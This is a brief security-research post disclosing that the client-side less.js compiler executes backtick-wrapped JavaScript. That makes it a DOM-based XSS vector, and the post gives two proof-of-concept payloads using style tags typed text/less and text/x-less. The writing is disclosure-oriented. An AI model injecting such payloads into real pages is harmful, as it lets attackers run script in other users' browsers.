LESS & SASS suddenly came to my mind when researching about of CSS Injection attacks. You know, both are css pre-processor so I think they don't support any client based operation. It is a mistake...
I saw
less.js when visiting to
http://lesscss.org/ page.
less.js provides interpreting javascript code with backtick char in LESS code. So DOM based XSS vulnerability arises at this point.
I published it on Twitter as new attack vector for LESS.
Also thanks to Rakesh Mane for the shortening!
less.js includes the regex pattern for type attribute of style element.
var t=/^text\/(x-)?less$/;
So it is supported these payloads:
<style type='text/less'>x{x:`alert(1)`}</style>
<style type='text/x-less'>x{x:`alert(1)`}</style>